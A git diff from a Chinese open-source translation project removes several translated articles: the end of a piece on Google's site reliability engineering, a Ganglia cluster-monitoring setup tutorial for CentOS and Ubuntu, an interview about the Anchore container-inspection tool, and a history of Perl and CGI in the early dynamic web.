如何花费时间。通过测量,我们确保团队不断花费不到 50% 的时间用于开发改变他们实践的工作上。通常这意味着会将一些运维负担转移回开发团队,或者给团队添加新的员工,而不指派该团队额外的运维责任。意识到在运维和开发工作之间保持这种平衡使我们能保证 SRE 具有参与创造性的自主工程的空间,同时仍然保留从运维那学来的智慧。 - -我们发现Google SRE 的运行大规模系统的方法有很多优点。由于 SRE 是直接修改代码以使Google的系统运行自己,SRE团队的特点是快速创新以及大量接受变革。这样的团队能相对价廉地支持相同的服务,面向运维的团队需要大量的人。相反,运行、维护和改进系统所需的 SRE 的数量随系统的大小而线性地缩放。最后,SRE 不仅规避了开发/运维分裂的障碍,而且这种结构也改善了我们的产品开发团队:产品开发和 SRE 团队之间的轻松转移交叉培训整个团队,并且提高了那些在学习构建百万级别分布式系统上有困难的开发人员的技能。 - -尽管有这些好处,SRE 模型的特点是其自身独特的挑战。 Google 面临的一个持续挑战是招聘 SRE:SRE 不仅与产品开发招聘流程竞争相同的候选人,而且我们将招聘人员的编码和系统工程技能都设置得如此之高,这意味着我们的招聘池必然很小。由于我们的学科相对新颖独特,在如何建立和管理 SRE 团队方面没有太多的行业信息(尽管希望这本书能朝着这个方向迈进!)。一旦 SRE 团队到位,他们潜在的非正统的服务管理方法需要强有力的管理支持。例如,一旦错误预估耗尽,除非是管理层的强制要求, 否则在季度剩余的时间里决定停止发布可能不会被产品开发团队所接受。 - -###### DevOps 或者 SRE? - -“DevOps” 这个术语在 2008 年末出现,并在写这篇文章时(2016 年早期)仍在发生变动。 其核心原则:IT部门在系统设计和开发的每个阶段的参与、对自动化与人力投入的严重依赖、工程实践和工具在操作任务中的应用,与许多 SRE 的原则和实践一致。 人们可以将 DevOps 视为向更广泛的组织,管理结构和人员的几种核心SRE原则。 可以等价地将 SRE 视为具有某些特殊扩展的 DevOps 的特定实现。 - - ------------------------- - -作者简介:Benjamin Treynor Sloss 创造了“网站可靠性工程”一词,他自2003年以来一直负责 Google 的全球运营、网络和生产工程。截至2016年,他管理着全球范围内一个大约4000名软硬件和网络工程师团队。 - --------------------------------------------------------------------------------- - -via: https://www.oreilly.com/ideas/what-is-sre-site-reliability-engineering - -作者:[Benjamin Treynor][a] -译者:[geekpi](https://github.com/geekpi) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://www.oreilly.com/people/benjamin-treynor-sloss -[1]:https://shop.oreilly.com/product/0636920053385.do -[2]:https://shop.oreilly.com/product/0636920053385.do -[3]:https://www.oreilly.com/ideas/what-is-sre-site-reliability-engineering -[4]:https://shop.oreilly.com/product/0636920053385.do -[5]:https://shop.oreilly.com/product/0636920053385.do -[6]:https://www.oreilly.com/people/benjamin-treynor-sloss -[7]:https://pixabay.com/ -[8]:https://www.oreilly.com/people/benjamin-treynor-sloss -[9]:http://shop.oreilly.com/product/0636920041528.do?intcmp=il-webops-books-videos-update-na_new_site_site_reliability_engineering_text_cta -[10]:http://conferences.oreilly.com/velocity/devops-web-performance-eu?intcmp=il-webops-confreg-update-vleu16_new_site_what_is_sre_text_cta -[11]:https://pixabay.com/ diff --git a/translated/tech/20160610 Setting Up Real-Time Monitoring with Ganglia.md b/translated/tech/20160610 Setting Up Real-Time Monitoring with Ganglia.md deleted file mode 100755 index 999338d476..0000000000 --- a/translated/tech/20160610 Setting Up Real-Time Monitoring with Ganglia.md +++ /dev/null @@ -1,226 +0,0 @@ -使用Ganglia来监控linux类型的网格和集群服务器 -=========== -自从SA接手服务和主机管理以后,监控类的工具就成了他们的好帮手。其中比较有名的有[Nagios][11], [Zabbix][10], [Icinga][9], 和 Centreon.以上这些重量级的监控工具,让一个新手SA来设置,并使用其中的高级特性是非常困难的。 -本文将向你介绍Ganglia,它是一个容易扩展配置的监控系统。它可以查看服务器中的各项性能指标,也可以实时图形化的展示集群配置。 -[![Install Gangila Monitoring in Linux](http://www.tecmint.com/wp-content/uploads/2016/06/Install-Gangila-Monitoring-in-Linux.png)][8] - -在Linux上安装Ganglia -Ganglia能够让集群和网格服务器更加容易管理。 -我们可以远程创建一个包含所有主机的网格配置,其中的成员主机可以使用模板设置。 - -此外Ganglia对移动设备进行过页面优化,排版非常人性化。当然你还可以导出`csv`和 `.json`格式的数据。 - -我们的测试环境包括一个安装Ganglia的主节点服务器CentOS7(IP 地址 192.168.0.29)和一个作为被监控端的Ubuntu 14.04主机 (192.168.0.32)。我们将通过Ganglia Web的页面来监控这台Ubuntu主机。 - -下面的例子可以给大家提供参考,CentOS7作为主节点,Ubuntu作为被监控对象。 - -### 安装和配置 Ganglia - -请遵循以下步骤在主节点服务器安装监控工具。 - -#### 1. 1. 使用yum源 [EPEL repository][7] ,然后安装 Ganglia和相关工具: -命令如下 - -``` -# yum update && yum install epel-release -# yum install ganglia rrdtool ganglia-gmetad ganglia-gmond ganglia-web -``` - -Ganglia将附加安装一些应用,它们的功能如下: - - 1. `rrdtool`, 轮询数据库,它是一个储存以及用图形化显示变化数据的工具 - 2. `ganglia-gmetad` 一个守护进程,用来收集被监控主机的数据。被监控主机与主节点主机都要安装Ganglia-gmond(监控守护进程自己) - 3. `ganglia-web` 提供Web前端用于显示监控系统的历史数据 - -#### 2. 使用Apache为Ganglia配置Web身份认证 - - 如果你想了解更多的高级认证机制,请参阅[Authorization and Authentication][6]选择Apache部分。 - - 为完成这部分的任务,我们需要用Apache来创建一个用户名和对应的密码,下面的例子我们先来创建一个叫`adminganglia`的用户名,然后给他分配一个密码,它将被储存在 /etc/httpd/auth.basic(如果随便选择根目录或其他Apache没有权限读取的目录,这项配置最终将会以失败告终。)  - -``` -# htpasswd -c /etc/httpd/auth.basic adminganglia - -``` - -给adminganglia添加密码,需要经过2次确认 - -#### 3. 修改配置文件 /etc/httpd/conf.d/ganglia.conf  - -``` -Alias /ganglia /usr/share/ganglia - -AuthType basic -AuthName "Ganglia web UI" -AuthBasicProvider file -AuthUserFile "/etc/httpd/auth.basic" -Require user adminganglia - - -``` - -#### 4. 编辑 /etc/ganglia/gmetad.conf: - - 首先, 使用gridname命令来设置集群的名称。 - -``` -gridname "Home office" - -``` - - 然后, 使用data_source命令根据集群的名称来设置主节点主机和被监控节点的轮询时间 - -``` -data_source "Labs" 60 192.168.0.29:8649 # Master node -data_source "Labs" 60 192.168.0.32 # Monitored node - -``` - -#### 5. 编辑 /etc/ganglia/gmond.conf. - - a)确保集群的配置和下面的一样。 - -``` -cluster { -name = "Labs" # The name in the data_source directive in gmetad.conf -owner = "unspecified" -latlong = "unspecified" -url = "unspecified" -} - -``` - - b) 在udp_send_chanel 中,注释掉 mcast_join directive: - -``` -udp_send_channel { -# mcast_join = 239.2.11.71 -host = localhost -port = 8649 -ttl = 1 -} - -``` - - c)在udp_recv_channel 中:注释掉mcast_join 和bind部分 - -``` -udp_recv_channel { -# mcast_join = 239.2.11.71 ## comment out -port = 8649 -# bind = 239.2.11.71 ## comment out -} -``` - - 保存并退出 - -#### 6.打开8649/udp端口,更改SELinux确保php脚本能够连接: - -``` -# firewall-cmd --add-port=8649/udp -# firewall-cmd --add-port=8649/udp --permanent -# setsebool -P httpd_can_network_connect 1 - -``` - -#### 7.重启Apache,gmetad,gmond并确保他们在开机启动里面。 - -``` -# systemctl restart httpd gmetad gmond -# systemctl enable httpd gmetad httpd - -``` - -至此,我们现在能够打开并登录Ganglia的Web页面 `http://192.168.0.29/ganglia`  - - [![Gangila Web Interface](http://www.tecmint.com/wp-content/uploads/2016/06/Gangila-Web-Interface.png)][5] - - Gangila Web Interface - -#### 8. 在Ubuntu上安装Ganglia-monitor: - -``` -$ sudo aptitude update && aptitude install ganglia-monitor - -``` - -#### 9. 编辑被监控主机的配置文件/etc/ganglia/gmond.conf,在主节点主机上也是相同的文件,注释掉网格里面不在线的主机。需要编辑udp_send_channel和udp_recv_channelshould这两项 - -``` -cluster { -name = "Labs" # The name in the data_source directive in gmetad.conf -owner = "unspecified" -latlong = "unspecified" -url = "unspecified" -} -udp_send_channel { -mcast_join = 239.2.11.71 -host = localhost -port = 8649 -ttl = 1 -} -udp_recv_channel { -mcast_join = 239.2.11.71 ## comment out -port = 8649 -bind = 239.2.11.71 ## comment out -} - -``` - -Then, restart the service: -之后重启服务 - -``` -$ sudo service ganglia-monitor restart - -``` - -#### 10. 刷新页面你将看到各种状态以及图形化的展示集群或网格的配置情况(用下拉菜单选择我们想查看的集群或网格): - -[![Ganglia Home Office Grid Report](http://www.tecmint.com/wp-content/uploads/2016/06/Ganglia-Home-Office-Grid-Report.png)][4] - -Ganglia中网格的报告 - -使用菜单按钮你可以选择组里面的节点主机,这将非常容易的获取到你感兴趣的信息。可以使用对比选项来查看集群中所有主机的信息。 - -当然你也可以使用正则表达式来快速对比一组主机 - -[![Ganglia Host Server Information](http://www.tecmint.com/wp-content/uploads/2016/06/Ganglia-Server-Information.png)][3] - -Ganglia Host Server Information - -One of the features I personally find most appealing is the mobile-friendly summary, which you can access using the Mobile tab. Choose the cluster you’re interested in and then the individual host: -能够使用移动设备管理,对于移动端有友好界面,这是一个非常吸引人的特点。在集群中选中一个主机,点击它。 - -[![Ganglia Mobile Friendly Summary View](http://www.tecmint.com/wp-content/uploads/2016/06/Ganglia-Mobile-View.png)][2] - -Ganglia 移动端截图 -### 总结 - -本篇文章向大家介绍了Ganglia,他是一个功能强大扩展性很好的监控工具,主要用来监控集群和网格。它可以随意安装,便捷的组合各种功能(你甚至可以尝试一下官方提供的demo网站[official website][1])。 -此时你可能会发现许多知名的it企业或许并不使用Ganglia来监控作为监控工具。他们有自己更好的工具去实现,除了那些工具以外,我们这篇文章里面提到的Ganglia可能是最方便的图形化(在图示主机上显示对应的名字)工具。 -但是请不要拘泥于本篇文章,尝试一下自己去做,不必犹豫不敢尝试。如果你有任何问题也欢迎给我留言。 --------------------------------------------------------------------------------- - -via: http://www.tecmint.com/install-configure-ganglia-monitoring-centos-linux/ - -作者:[Gabriel Cánepa][a] - -译者:[ivo-wang](https://github.com/ivo-wang) - -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 组织编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]: http://www.tecmint.com/author/gacanepa/ -[1]:http://ganglia.info/ -[2]:http://www.tecmint.com/wp-content/uploads/2016/06/Ganglia-Mobile-View.png -[3]:http://www.tecmint.com/wp-content/uploads/2016/06/Ganglia-Server-Information.png -[4]:http://www.tecmint.com/wp-content/uploads/2016/06/Ganglia-Home-Office-Grid-Report.png -[5]:http://www.tecmint.co m/wp-content/uploads/2016/06/Gangila-Web-Interface.png -[6]:http://httpd.apache.org/docs/current/howto/auth.html -[7]:http://www.tecmint.com/how-to-enable-epel-repository-for-rhel-centos-6-5/ -[8]:http://www.tecmint.com/wp-content/uploads/2016/06/ Install-Gangila-Monitoring-in-Linux.png -[9]:http://www.tecmint.com/install-icinga-in-centos-7/ -[10]:http://www.tecmint.com/install-and-configure-zabbix-monitoring-on-debian-centos-rhel/ -[11]:http://www.tecmint.com/install-nagios-in-linux/ diff --git a/translated/tech/20161004 Keeping Linux containers safe and secure.md b/translated/tech/20161004 Keeping Linux containers safe and secure.md deleted file mode 100644 index 706a916c96..0000000000 --- a/translated/tech/20161004 Keeping Linux containers safe and secure.md +++ /dev/null @@ -1,67 +0,0 @@ -# 保持Linux容器的安全和稳定 - -![Interview with Andy Cathrow of Anchore](https://opensource.com/sites/default/files/styles/image-full-size/public/images/business/bus-containers2.png?itok=rG1pTnZ4) - -> 图片来源: [Lucarelli](http://commons.wikimedia.org/wiki/User:Lucarelli) 基于 [Wikimedia Commons](http://commons.wikimedia.org/wiki/File:Containers_Livorno.jpg). CC-BY-SA 3.0 - -Linux容器正在帮助改变IT从业者的工作方式。相比于大的、其中的虚拟机器,一些组织发现把他们的应用部署在容器中更有效,可以提供更快的速度,更加密集,提升他们操作的敏捷性 - -和传统的基础设施一样,确保运行在一个容器内的组件和系统库的定期更新是至关重要的,但是你如何知道什么东西运行在你的容器内?为了帮助管理全部这些的安全挑战,一个名为[Anchore](https://anchore.com)的[开源项目](https://github.com/anchore/anchore)正在开发,它用来帮助展示Linux容器中的内容。 - -为了了解更多关于Anchore,我赶上了 Anchore 的市场和产品的发言人 Andrew Cathrow,来了解更多关于这个开源项目背后的公司。 - -![](https://opensource.com/sites/default/files/images/life/Interview%20banner%20Q%26A.png) - -### 简而言之 Anchore是什么? 它如何工作? - -Anchore 的目标是提供一个允许开发人员、运营团队、安全团队通过开发生命周期的容器,保持完整的“托管链”的可见性,同时提供生产部署所需的可见性、可预测性和控制性。Anchore的引擎通过插件可以进行分析(通过提取图像数据和元数据)、查询(允许对容器进行报告)、以及策略评估(这里的正常指可以被指定的管理的图像)。 - -虽然市场上有很多扫描工具,但是大部分不开源。我们认为安全合规的产品应该是开源的,否则你怎么才能信任他们。 - -Anchore 除了开源以外,还有两大优势,使他可以区别于市场中的商业产品。 - -首先,我们看的不止是操作系统的镜像。如今的扫描工具专注于操作系统的软件包,比如“你的RPM或DEB包中有CVE(安全漏洞)么?”.这虽然是很重要的,你不希望你的镜像中有不安全的包,但是操作系统包只是镜像的基础。其他的层次都需要进行验证,包括配置文件、语言模块、中间件等等。你可以拥有所有的最新的软件包,但是可能一个配置文件配置出现错误或者是不安全的配置。第二个不同就是允许用户添加自己的数据库拓展、查询或策略。 - -### 什么推动了容器的校验和分析工具?这个工具可以解决运营面临的什么问题呢? - -企业使用Docker首要关注的就是安全,特别是他们正在部署的容器的分配和合规性。在生产环境中,从公共镜像库拉取一个镜像,运行它,并在几秒钟部署,是非常简单的,甚至不知道下面可能发生什么。 - -容器是不透明的,包含应用程序的他们是可以部署的“黑盒”。虽然非常容易把这些镜像看作“打包的应用程序”,但是他们包括了系统的镜像和多达数百个包和成千上万个文件。 - -要对您的容器部署有信心,你需要知道底层是什么和基于容器镜像的内容来做出决定。 - -### 如今容器的创新基本上都是开源的,你认为那是什么呢?是什么驱动了他们开源呢? - -在过去的20年中,组织已经经历了开源带来的优势,节省成本,减少锁定,提高了安全性和更快的创新。容器,特别是Docker,都是非常好的例子。Docker公司的团队不能创建在专有系统上创建一个新的软件部署模式,也不能够于行业领导者比如谷歌、IBM、英特尔、红帽合作,朝着一个共同的目标。开源和Linux总是开启创新和进行积极的产业干扰。在过去,实现一个大的想法需要一个大的团队和很多资源。在开源世界,一个有着大的创意的小公司可以工作在一个更大的社区中,通过知识共享的力量来协作,提供真正的企业创新 - -为了深入的说明开源的使用,Anchroe 团队最近从多伦多的 LinuxCon 返回,在哪里,令人难以相信的是,微软作为钻石级的赞助商,展示了他们的产品组合在Linux上的工作。Linus Toravlds 曾说过,“如果微软为Linux做应用就意味着我赢了”。我要把这句话改为“开源赢了”。 - -### 容器领域的通用标准的创建还需要时间,在容器的几乎所有部分,仍有许多挑战。在这个领域,创业公司有哪些挑战? - -这里有个很重要的点,就是没有开放的标准和开源,我们不可能看到快速推动容器的采用和改变行业格局的创新。开放容器倡议(OCI)由Linux和容器行业的行业领导者组成,正在为运行环境和镜像格式创造标准,这将使我们能够看到更多的创新。Anchore很自豪能成为OCI的新成员,我们期待帮助形成标准。 - -你如何为Anchor项目建立一个开源社区? - -Anchore团队来自Ansible,Eucalyptus Systems和Red Hat的领导团队,在开源社区中拥有丰富的工作经验。从一开始,Anchore开始创建一个强大的开源社区,我们正在应用我们在开源世界中学到的经验和教训。第一课,当然,很快,也很频繁。我们在6月开源我们的检测和分析引擎,远远早于我们的商用产品。为了确保开源项目能够独立运行,使更多的直接用户能够使用它,而无需购买Anchore的商用产品。有很多机会,通过支持、服务和增强型的数据源,通过商用产品创造更多价值,但是如果开源引擎本身没有用,我们将看不到活跃的社区。 - -我们将Anchore模块化,允许添加分析、报告和策略插件,而不需要更改核心的引擎。我们希望保证任何人都可以创建插件,所以我们选择了Python作为项目的基本语言,因为Python被开发者和系统管理员广泛应用。但是,即使你不熟悉Python,你仍然可以使用任何你喜欢的语言或者脚本环境创建插件。如果你可以创建一个Bash脚本,那么你可以创建一个Anchore插件。我们的目标是最大化的吸引社区的参与。虽然我们鼓励用户将贡献回馈给社区,但是我们也为这个项目构建并授权来确保可以独立创建和维护这些私有的插件和模块。 - -### 容器的约定不止是在服务器上更大密度的部署应用程序或者技术层面更快的速度,而且还有不同工具的组合,这些工具提供了一种不同的方式来接近开发者和操作者共同工作的方式。作为在这个领域工作的公司,你们希望提供一个什么样的消息来让开发者和运营产生共鸣? - -随着越来越多的运行环境、编排、监控和集成产品,容器的生态系统正在快速发展。所以,我们的架构中的第一个考虑因素不是关于Anchore的部署和使用。我们需要确保我们可以适应任何CI/CD的通道,无论是私有部署还是云端部署。我们通常做的假设是,如果Anchore将提供一个包含镜像扫描和分析的容器仓库。虽然这将大大简化我们的工作,但是这会迫使用户进入特定的部署架构,并限制了用户部署他们自己最好的组件的能力。我们已经确保Anchore可以和所有先进的仓库、运行环境CI/CD平台和编排工具配合使用。 - -一些开发者添加了运营技能,并转移到 Devops 角色,我们看到系统管理员/运营团队在转换角色时,更多的了解开发。我们也看到了具有混合能力的团队。我们设计了Anchore来供开发运营和安全团队使用,因此他们可以在开发周期中的任何一点来一起工作,评估规则和策略。另外一个例子是插件/模块的架构,使任何人都可以在他们喜欢的环境中轻松创建一个模块 -无论是Python、Go、Perl、C 甚至是一个Bash脚本。 - ------- - -via: https://opensource.com/business/16/10/interview-andy-cathrow-anchore - -作者:[Jason Baker][a] - -译者:[Bestony](https://github.co/Bestony) - -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]: https://opensource.com/users/jason-baker diff --git a/translated/tech/20161103 Perl and the birth of the dynamic web.md b/translated/tech/20161103 Perl and the birth of the dynamic web.md deleted file mode 100644 index a48a80d33d..0000000000 --- a/translated/tech/20161103 Perl and the birth of the dynamic web.md +++ /dev/null @@ -1,90 +0,0 @@ -# Perl 与动态网站的诞生 - ->在新闻组和邮件列表,计算机科学实验室,各大陆之间流传着一个关于 Perl 对于动态网站的作用的迷人故事。 - - ![Perl and the birth of the dynamic web](https://opensource.com/sites/default/files/styles/image-full-size/public/images/business/osdc-lead-web-internet.png?itok=hq81pSDs "Perl and the birth of the dynamic web") ->图片来源 : [Internet Archive Book Images][30], 由 Opensource.com 修改. [CC BY-SA 4.0][29]. - -人们记得这样一些早期互联网历史中的一系列的萌芽事件:如 Tim Berners-Lee 在邮件组上 [述说][28] WWW-project 的那天,[CERN][27] 将项目代码及文档释出到公共域的时刻,以及 1993 年 1 月的[第一版 NCSA Mosaic 浏览器][26]。虽然这些独立的时刻是相当重要的,但是当时的技术的开发已经更为丰富而不再是由一组的孤立事件组成,更像是一系列有内在联系的故事。 - -其中的一个故事描述的是网站是如何变成_动态的_,通俗说来就是我们如何使服务器比在提供静态 HTML 文档的状态下做更多的事。这是个流传在新闻组和邮件列表,计算机科学实验室,各大陆之间的故事,专注于一个人,一种编程语言:Perl。 - -### CGI 脚本和信息套件(这里将 infoware 翻译成了信息套件件不确定是否合适) - -在上世纪 90 年代中后期,Perl 几乎和动态网站是同义词。Perl 是一种相对来说容易学习的解释型语言并且有强大的文本处理特性,使得它能够很容易的编写脚本来连接网站的数据库,处理由用户发送的格式化数据,同时生成这些上世纪 90 年代的网站图标,点击量和用户手册。 - -类似的网站特性渐渐的变成了格式话的 CGI 脚本,全称为通用网关接口(Common Gateway Interface),[第一次实现][24]由 Rob McCool 于 1993 年 11 月在 NCSA HTTPD 上完成。CGI 被设计成允许功能话的访问接入,并且在短短几年之内任何人都可以很容易的找到一些由 Perl 写的预制脚本存档。有一个声名狼籍的案例就是 [Matt's Scripts Archive][23],这是一种流行的包含安全缺陷的源使得 Perl 社区成员创建了一种被称为 [Not Matt‘s Scripts][22] 的更为专业的替换选项。 - -在当时爱好者和职业程序员都采用 Perl 来制作动态网站和应用,Tim O’Reilly [创造了词汇“信息套件”][21] 来描述网站和 Perl 处于变化中的计算机工业的哪一部分。考虑到 Yahoo! 和 Amazon 带来的创新,O‘Reilly 写道:“传统软件在大量的软件中仅仅包含了少量的信息;信息套件则在少量的软件中包含了大量的信息。” Perl 是一种像瑞士军刀一样的完美的小而强大的工具支撑了信息媒体从巨大的网站目录向早期的用户生成内容平台的转变。 - -### 题外话 - -尽管我们可以很溜的使用 Perl 来制作 CGI,但是编程语言和不断提升中的动态网站之间的关系变得更加的密切与深入。在[第一个网站][20](在 1990 年的圣诞节前)出现到 1993 年 McCool 实现 CGI 的大多数时间里,对于上世纪 90 年代和更早以前的网站定义为格式化的位图和让人云里雾里的表格。尽管 Berners-Lee 也对这些早期的岁月产生了影响,但是不同的人看到的是网络不同的潜在作用,并将它推向各自不同的方向。一方面,这样的结果来自一些著名的辩论,例如 [HTML 应该和 SGML 保持多近的关系][19], [是否应该实现一个图像标签][18]。在另一方面,在没有直接因素影响的情况下改变是及其缓慢的。后者已经很好的描述了动态网站是如何被开发的。 - -从某种意义上说,第一个网关的诞生可以追溯到 1991 至 1992 年之间,当时 Berners-Lee 和一些计算及科学家与超文本爱好者编写服务程序使得一些特定的资源能够连接到一起,例如 CERN 的内部应用程序,通用的应用程序如 Oracle 数据库,[广域信息查询系统(WAIS)][16]。(WAIS 是由互联网的先驱在上世纪 80 年代后期开发的,其中,[Brewster Kahle][15],是一个数字化图书管理员和 [Internet Archive][14] 的创始人。)这样的话,网关就是一个被设计用来连接其它网络,数据库或者应用程序的客户网络服务器。任何的动态特性就是意味着在不同的端口上运行另外的守护进程(参考阅读,例如 Berners-Lee 对于在网站上 [如何添加一个搜索功能][13] 的描述)。Berners-Lee 期望万维网(将这里的web翻译成了万维网不知是否合适)可以成为不同信息系统之间的通用接口,并且鼓励单一目的服务的扩展。他也提到 Perl 是一种强大的(甚至是不可思议)可以将各种东西组合起来的语言。 - -然而,另一种对“网关”的理解指出它不一定是一个客户端设备可能只是一个脚本,一个不需要额外服务器的低吞吐量的附加脚本。这种形式的首次出现是有争议性的 Jim Davis 的 [Gateway to the U Mich Geography server][11],在 1992 年的 11 月被发布在了 WWW-talk 邮件列表中。Davis 的脚本是使用 Perl 编写的,是一种网络 API 的原型,基于用户格式化的查询从另外的服务器拉取数据。我们来说明一下这两种对于网关的理解的不同之处,Berners-Lee [回复了][10] Davis 的邮件期望他和 Michigan 服务器的作者“能够达成一些共识”,“从网络的角度来看的话”使用一台服务器(这里将one server翻译成了一台服务器不知是否合理,似乎也可能是一类服务器程序)来提供这样的信息可能会更有意义。Berners-Lee,可能是期待着网络(这里将web翻译成了网络可能有点不妥)的发明者可以提出一种有秩序的信息资源访问方式。这样的不断增加的从不同服务器上拉取数据的网关和脚本意味着一种潜在的网络的质的变化,这里扩展了当然也可能有点偏离了 Berners-Lee 的原始观点。 - -### 回到 Perl HTTPD - -在 Davis 的地理服务器上的网关向标准化的低吞吐量的通过 CGI 方式实现的脚本化的网关之间,Perl HTTPD 的出现是很重要的事件,在 1993 初由印地安纳大学的研究生 Marc Van Heyningen 在布卢明顿(Bloomington)完全使用 Perl 语言实现了一个网络服务器程序。从 Van Heyningen 给出的[设计原则][8]来看,基于使用 Perl 就不需要任何的编译过程这样一种事实,使得它能够成为一种极易扩展的服务器程序,这个服务器包含了一个特性,只要简单的重启一下就可以添加新特性到服务器程序中并且不会有任何的宕机时间,使得这个服务器程序可以频繁的加入新功能(这里似乎有点敏捷开发的样子,不太确定该如何描述更好)。 - -Perl HTTPD 代表了那种服务器程序应该是单一,特定目的相对观点。相应的,这种模式似乎暗示了在网络发展中像这样持续不断提高测试软件产品可能会最终变成一种共识。Van Heyningen 在后来[提到过][7]他从头编写这样一个服务器程序的初衷是当时没有一种简便的方式使用 CERN 服务器程序来生成“虚拟文件”(例如,动态生成的页面),他打趣说使用 Perl 这样像天书一样的语言来写可能是最简单的方式了。在他编写的众多脚本的初期就是一个连接 Sun 用户手册的网络接口同时也是一个 [Finger Gateway][6](一种用来共享计算机系统信息或者是用户信息的早期协议)。 - -虽然 Van Heyningen 将印地安纳大学的服务器主要用来连接现存的信息资源,他和研究生们同时也看见了作为个出版形式的潜在可能。其中一件广为人知事件是在 1993-1994 年之间围绕着一个著名的加拿大案件而[公布][5]的一系列的文件,照片和新闻故事,与此同时所有的全国性媒体保持了沉默。 - -Perl HTTPD 没有必要保持持久的活力。今天,Van Heyningen 回忆起这个程序的时候认为这个程序只是当时的一个原型产品。它的原始目的只是向那些已经选择了 Gopher 作为大需网络接口的高级职员们展示网络的另一种利用方式。Van Heyningen 用代码回应了他导师们自豪的[一种基于网络的索引搜索的原型][4]。就是说,在服务器程序技术方面关键创新是为了赢得争论的胜利而诞生的,在这个角度上来看代码做到了所有呼唤它所做的事。 - -不管服务器程序是否是短暂的,伴随者 Perl HTTPD 一起出现的理念已经传播到了各个角落。Van Heyningen 开始收到代码请求并且将它分享到了网上,总之就是如果想要将服务器与其它系统相连接就需要了解一些 Perl。不久之后,居住在奥斯汀(Austin)的程序员 Tony Sanders 开发了一个被称为 [Plexus][3] 的轻便版本。Sander 的服务器程序是一款全功能的产品并且同样包含了 Perl HTTPD 所建议的以扩展性,当你需要的时候可以添加一些新的特性如图片解码等。Plexus [直接影响了][2] Rob McCool 给 NCSA HTTPD 服务器上的脚本开发的“htbin”,并且同样影响到了不久之后诞生的通用网关接口(CGI)。 - -在这些历史遗产之外,感谢妙不可言的 Internet Archive(互联网时光机)使得 Perl HTTPD 在今天保留在一种我们依然可以获取的形式,你可以从[这里下载][1]。 - -### 历史展望 - -对于技术世界的颠覆来说,技术的改变总是在一个相互对立的过程中。现有的技术是思考新技术的基础与起点。过时的编程形式启迪了今天人们做事的新方式。网络世界的创新可能看起来更像是对于就技术的扩展,不仅仅是 Perl。 - -在简单枯燥的萌芽事件时间轴之外,网络历史学者也许可以从 Perl 获取更多的线索。其中一部份的挑战在于材料的获取。更多需要作的事情包括从可获得的大量杂乱的数据中梳理出它的结构,将分散在邮件列表,归档网站,书本和杂志中的信息内容组合在一起。还有一部分的挑战是需要认识到互联网的历史不仅仅是新技术发布的日子,它同时包括了个人记忆,人类情感与社会进程等,并且这不仅仅是单一的历史线而是有许许多多条相似的历史线组合而成的。就如 Perl 的信条一样“殊途同归。(There's More Than One Way To Do It.)” - --------------------------------------------------------------------------------- - -via: https://opensource.com/life/16/11/perl-and-birth-dynamic-web - -作者:[Michael Stevenson][a] - -译者:[wcnnbdk1](https://github.com/wcnnbdk1) - -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://opensource.com/users/mstevenson -[1]:https://web.archive.org/web/20011126190051/http://www.cs.indiana.edu/perl-server/httpd.pl.tar.Z -[2]:http://1997.webhistory.org/www.lists/www-talk.1993q4/0516.html -[3]:https://web.archive.org/web/19990421192342/http://www.earth.com/server/doc/plexus.html -[4]:https://web.archive.org/web/19990428030253/http://www.cs.indiana.edu:800/cstr/search -[5]:https://web.archive.org/web/19970720205155/http://www.cs.indiana.edu/canada/karla.html -[6]:https://web.archive.org/web/19990429014629/http://www.cs.indiana.edu:800/finger/gateway -[7]:https://web.archive.org/web/19980122184328/http://www.cs.indiana.edu/perl-server/history.html -[8]:https://web.archive.org/web/19970720025822/http://www.cs.indiana.edu/perl-server/intro.html -[9]:https://web.archive.org/web/19970720025822/http://www.cs.indiana.edu/perl-server/code.html -[10]:https://lists.w3.org/Archives/Public/www-talk/1992NovDec/0069.html -[11]:https://lists.w3.org/Archives/Public/www-talk/1992NovDec/0060.html -[12]:http://info.cern.ch/hypertext/WWW/Provider/ShellScript.html -[13]:http://1997.webhistory.org/www.lists/www-talk.1993q1/0109.html -[14]:https://archive.org/index.php -[15]:http://brewster.kahle.org/about/ -[16]:https://en.wikipedia.org/wiki/Wide_area_information_server -[17]:http://info.cern.ch/hypertext/WWW/Daemon/Overview.html -[18]:http://1997.webhistory.org/www.lists/www-talk.1993q1/0182.html -[19]:http://1997.webhistory.org/www.lists/www-talk.1993q1/0096.html -[20]:http://info.cern.ch/hypertext/WWW/TheProject.html -[21]:https://web.archive.org/web/20000815230603/http://www.edventure.com/release1/1198.html -[22]:http://nms-cgi.sourceforge.net/ -[23]:https://web.archive.org/web/19980709151514/http://scriptarchive.com/ -[24]:http://1997.webhistory.org/www.lists/www-talk.1993q4/0518.html -[25]:https://en.wikipedia.org/wiki/Usenet_newsgroup -[26]:http://1997.webhistory.org/www.lists/www-talk.1993q1/0099.html -[27]:https://tenyears-www.web.cern.ch/tenyears-www/ -[28]:https://groups.google.com/forum/#!msg/alt.hypertext/eCTkkOoWTAY/bJGhZyooXzkJ -[29]:https://creativecommons.org/licenses/by-sa/4.0/ -[30]:https://www.flickr.com/photos/internetarchivebookimages/14591826409/in/photolist-oeqVBX-xezHCD-otJDtG-whb6Qz-tohe9q-tCxH8y-xq4VfN-otJFfh-xEmn3b-tERUdv-oucUgd-wKDyLy-owgebW-xd6Wew-xGEvuT-toqHkP-oegBCj-xtDdzN-tF19ip-xGFbWP-xcQMJq-wxrrkN-tEYczi-tEYvCn-tohQuy-tEzFwN-xHikPT-oetG8V-toiGvh-wKEgAu-xut1qp-toh7PG-xezovR-oegRMa-wKN2eg-oegSRp-sJ29GF-oeqXLV-oeJTBY-ovLF3X-oeh2iJ-xcQBWs-oepQoy-ow4xoo-xknjyD-ovunVZ-togQaj-tEytff-xEkSLS-xtD8G1 diff --git a/translated/tech/20161111 How to increase screen resolution on XenServer 7 GUI Virtual Machine.md b/translated/tech/20161111 How to increase screen resolution on XenServer 7 GUI Virtual Machine.md 